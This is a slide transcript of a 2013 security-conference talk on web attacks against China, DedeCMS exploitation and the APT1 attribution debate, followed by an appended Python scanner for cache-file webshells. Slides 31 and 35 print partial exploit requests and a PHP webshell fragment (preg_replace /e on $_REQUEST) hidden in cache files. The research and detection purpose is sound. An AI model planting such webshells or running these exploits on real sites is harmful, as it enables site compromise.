AVTokyo 2013.5 - China is a victim, too :-)


Post on 27-Jun-2015


Category:

Technology



DESCRIPTION

{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-)

Anthony Lai, Zetta KE (Japanese abstract, translated): China is always seen as the attacker that attacks others; here we flip the viewpoint and ask whether China itself is being attacked by someone, and show what kinds of attacks it receives and for what reasons. Further, we look at how APT research reports published by other well-known organizations "deduce" that attacks come from China, and comment on their "logic". We are also analysing at VXRL the Web attack data captured by Knownsec, and if all goes well we expect to present a much clearer picture. Of course, there is also off-the-record material that is not on the agenda, so we think everyone will enjoy it.

China is always taken as an attacker that attacks others; let us take a look at who is attacking China, what kinds of attacks China is suffering from and the possible reasons. Moreover, we would like to take APT research reports published by other famous agencies and look at how they "deduce" that attacks come from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis; hopefully, we can get a much clearer picture. Of course, we have a hidden agenda as well. It will be a fun session, so let us enjoy it.

TRANSCRIPT

  • 1. China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL

  • 2. (no recoverable text)
  • 3. Part 1: Web / Part 2 / Part 3: APT1 (Ran2)
  • 4. Part 1: Web
  • 5. Knownsec FW / VXRL, 11/11 (Singles Day), IP
  • 6. Singles Day, ?
  • 7. Singles Day, ?
  • 8. Singles Day: http://en.wikipedia.org/wiki/Singles_Day
  • 9. vs
  • 10. 11/11 vs 1
  • 11. 11/11 vs : 1
  • 12. Attack type breakdown (Attack Type / No. of Requests / Percentage):
        SCANNER       59101248   91.3447%
        LRFI            218753    0.3381%
        FILEI           222774    0.3443%
        SPECIAL          35838    0.0554%
        WEBSHELL         42463    0.0656%
        COLLECTOR      4491625    6.9421%
        SQLI            274792    0.4247%
        XSS             225796    0.3490%
        OS_COMMAND        1022    0.0016%
        CODE             86140    0.1331%
        OTHERS             887    0.0014%
        Total         64701338  100.00%
        (The labels COLLECTOR, OS_COMMAND, CODE and OTHERS were detached from their rows by extraction and are matched here in their listed order; the eleven counts sum exactly to the total.)
  • 13. (2013/11/11) 97.5% IP, 2.5%
  • 14. Attacks by country (Country / Attack count):
        China        1070489
        US             18588
        Netherlands     5404
        Hong Kong       4288
        Korea           1823
        Turkey          1429
        Japan            872
  • 15. 2524
  • 16. (no recoverable text)
  • 17. Tou.php, Tou, 6.5GB
  • 18. Abuse X-Forwarded-For to fake different IP addresses for voting from 58.64.X.X
  • 19. ISP :)
  • 20. 11/11 (Singles Day), 47, OS
  • 21. Country / IP:
        China       116.252.224.162
        US          173.208.240.190
        Korea       119.70.29.137
        Hong Kong   58.64.205.27
        Thailand    110.34.230.226
        Taiwan      118.233.66.105
        Japan       202.89.232.79
  • 22. Python, 7, DDoS, 0:00-23:59
  • 23. IP :) http://www.dklkt.cn/article.asp?id=233
  • 24. (no recoverable text)
  • 25. CMS, CMS
  • 26. (no recoverable text)
  • 27. webscan.360.cn IP
  • 28. 315online.com.cn
  • 29. (no recoverable text)
  • 30. WordPress
  • 31. /plus/download.php?open=1&arrs1%5B %5D=99&arrs1%5B%5D=102&arrs1%5B %5D=103&arrs1%5B%5D=95&arrs1%5B %5D=100&arrs1%5B%5D=98&arrs1%5B %5D=112&arrs1%5B%5D=114&arrs1%5B %5D=101&arrs1%5B%5D=102&arrs1%5B %5D=105&arrs1%5B%5D=120&arrs2%5B %5D=109&arrs2%5B%5D=121&arrs2%5B
        DedeCMS webshell; DedeCMS: http://www.wooyun.org/searchbug.php?q=dedecms
  • 32. DedeCMS (CMS)
  • 33. DedeCMS
  • 34. DedeCMS exploit. Interesting technique to hide the webshell: put it like a cache file.
        http://www.nxadmin.com/penetration/1168.html
        http://blog.csdn.net/seoyundu/article/details/12855759
        /plus/download.php exploit - inject webshell: http://www.xiaosedi.com/post/dedecms_exp_01.html
        /plus/search.php exploit - inject webshell: http://eoo.hk/oswork/28.htm
        DedeCMS backdoor killer from Anquan.org: http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895
  • 35. 90sec.php, .inc: {dede:php}file_put_contents(90sec.php,'); {/dede:php}
        data/cache htm (myad1.htm, myad-16.htm, mytag-1208.htm): ); > axxxxx);echo OK;@fclose($fp);?>); > guige, 90sec.org;@preg_replace(/ [copyright]/e,$_REQUEST['guige'],error);?>); >
  • 36. .htm webshell: .htm, php include, /mytag_js.php
  • 37. ID, URL, webshell: http://www.nxadmin.com/plus/mytag_js.php?id=1208 http://www.nxadmin.com/plus/ad_js.php?id=1 ; http://www.nxadmin.com/penetration/1168.html
  • 38. Part 2:
  • 39. Wooyun: MITRE CVE (http://www.wooyun.org/whitehats/)
  • 40. #1: CMS http://www.wooyun.org/bug.php?action=list&subtype=52
  • 41. #2: 360, 360 ! -_-
  • 42. http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
  • 43. #3:
  • 44. ZoomEye (www.zoomeye.org)
  • 45. Anquan.org, 800: http://www.anquan.org/help/aboutus/authen/
  • 46. Part 3: APT1 - VXRL Ran2
  • 47. APT1: Mandiant APT1, VXRL Ran2, Mandiant 61389:
  • 48. Mandiant APT1, 2013 2 18: Mandiant "APT1:", Mandiant, PLA 61398, APT, APT1
  • 49. Mandiant APT1, Mandiant APT: "Mandiant Beijing", "Mandiant PLA"
  • 50. #1: APT1, Mandiant, Mandiant APT1, APT1 51, APT1, APT1, APT1 FQDN (FQDN), Rootkit.com
  • 51. #1: APT1 3, PLA, Mandiant, UglyGorilla, UG
  • 52. #1: Jack Wang, UglyGorilla, Jack Wang 15 2, APT1
  • 53. #1: UglyGorilla, APT1, Jack Wang, Wang Dong, PLA 61398
  • 54. #1: UglyGorilla, APT1, DOTA, DOTA RDP
  • 55. #1: DOTA, DOTA 2j3c1k 3 2
  • 56. #1: APT1, PLA 61398
  • 57. 2: Mandiant 4, 1905, 1849 - Microsoft OS, Microsoft OS, Mandiant APT1
  • 58. 2: RDP, RDP 4, RDP, RDP - US 0x0804 4
  • 59. APT1 http://espionageware.blogspot.hk/
  • 60. 11/11 Web, SQL, CMS
  • 61. (no recoverable text)
  • 62. Thank you so much :) Zetta, Ran2, Knownsec; darkfloyd@vxrl.org ozetta@vxrl.org ran2@vxrl.org
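As an added defender-side illustration of the cache-file hiding technique on slides 34-37 (example code written for this page, not VXRL's, Knownsec's or DedeCMS's own): a scanner that walks a DedeCMS data/cache tree and flags .htm/.inc fragments that carry PHP, since plus/mytag_js.php and plus/ad_js.php include those files. The indicator names, the regexes and the three sample files are constructed for the example.

```python
import os
import re
import tempfile

# Indicators that have no business in DedeCMS data/cache/*.htm fragments: those files
# should hold only HTML/JS, but plus/mytag_js.php and plus/ad_js.php include() them, so any
# PHP smuggled in runs. Indicator names and patterns are this example's own, not DedeCMS's.
INDICATORS = [
    ("php_open_tag", re.compile(r"<\?php|<\?=|<\?\s", re.I)),
    ("dede_php_tag", re.compile(r"\{dede:php\}", re.I)),
    # preg_replace() with the /e modifier; quotes optional, as in the stripped slide text
    ("preg_replace_e_modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"]?)([^\w\s]).*?\2[a-z]*e[a-z]*\1", re.I | re.S)),
    ("request_superglobal", re.compile(r"\$_(REQUEST|POST|GET|COOKIE|FILES)\b")),
    ("suspicious_call", re.compile(r"\b(file_put_contents|fwrite|fopen|eval|base64_decode)\s*\(", re.I)),
]

def scan_text(content):
    """Return the names of all indicators present in one cache fragment."""
    return [name for name, rx in INDICATORS if rx.search(content)]

def scan_cache_dir(cache_dir, suffixes=(".htm", ".html", ".inc")):
    """Walk a data/cache tree; map each tainted file (path relative to it) to its indicators."""
    findings = {}
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            path = os.path.join(root, name)
            if not name.lower().endswith(suffixes):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[os.path.relpath(path, cache_dir)] = hits
    return findings

def demo():
    """Build a constructed data/cache tree (one clean, two tainted files) and scan it."""
    samples = {
        "myad-1.htm": "<a href='/promo'><img src='/img/banner.png'></a>",  # legitimate ad fragment
        "myad-16.htm": "{dede:php}echo 'OK';{/dede:php}",  # template PHP tag, as on slide 35
        # /e-modifier call with a fixed replacement: flagged for the modifier, not a shell
        "mytag-1208.htm": "<?php $s = preg_replace(\"/[copyright]/e\", \"strtoupper('x')\", \"error\"); ?>",
    }
    with tempfile.TemporaryDirectory() as cache_dir:
        for name, body in samples.items():
            with open(os.path.join(cache_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_cache_dir(cache_dir)  # {'myad-16.htm': [...], 'mytag-1208.htm': [...]}
```

Any hit is worth a manual look: a cache fragment that is included by PHP should never contain PHP tags or request superglobals, whatever the surrounding code does.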